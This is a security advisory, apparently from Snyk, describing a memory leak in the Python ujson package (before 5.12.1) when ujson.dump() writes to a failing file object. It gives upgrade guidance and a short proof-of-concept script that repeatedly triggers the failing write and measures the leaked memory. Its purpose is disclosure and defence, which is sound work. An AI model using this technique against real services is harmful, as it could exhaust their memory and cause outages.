Missing Release of Memory after Effective Lifetime Affecting ujson package, versions [,5.12.1)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Missing Release of Memory after Effective Lifetime vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-PYTHON-UJSON-16643463
- published13 May 2026
- disclosed12 May 2026
- creditErdembileg Ariunbold
Introduced: 12 May 2026
NewCVE-2026-44660 (opens in a new tab)How to fix?
Upgrade ujson to version 5.12.1 or higher.
Overview
ujson is an Ultra fast JSON encoder and decoder for Python
Affected versions of this package are vulnerable to Missing Release of Memory after Effective Lifetime in the objToJSONFile() function in objToJSON.c, when a write operation to a file-like object fails and raises an exception. An attacker can cause the application to leak memory by repeatedly triggering failing ujson.dump() calls. ujson.dumps() is not affected by this vulnerability.
PoC
import gc, tracemalloc, ujson
class BadFile:
def write(self, s):
raise RuntimeError("boom")
obj = {"x": "A" * 200000}
def run():
try:
ujson.dump(obj, BadFile())
except RuntimeError:
pass
run()
tracemalloc.start()
gc.collect()
base = tracemalloc.get_traced_memory()[0]
for i in range(5):
run()
gc.collect()
cur = tracemalloc.get_traced_memory()[0]
print(i, cur - base)